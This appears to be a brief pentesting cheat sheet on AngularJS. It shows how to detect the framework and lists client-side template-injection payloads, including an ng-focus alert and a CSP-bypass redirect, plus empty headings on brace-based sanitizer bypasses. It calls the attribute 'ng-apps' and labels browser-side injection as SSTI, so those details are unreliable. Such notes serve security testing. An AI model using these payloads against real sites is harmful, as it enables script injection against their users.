Angular Pentesting

Last modified: 2023-07-12


AngularJS is a web application framework.

HTML Attributes

If a website uses AngularJS framework, the nodes have a “ng-apps” attribute. So you can check it in a HTML source code.

<div ng-apps>

Server-Side Template Injection (SSTI)

<input ng-focus=$event.view.alert('test')>

<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

It worth testing to bypass sanitizing as below.

# Remove one-pair braces

# Remove all braces

# Add additional braces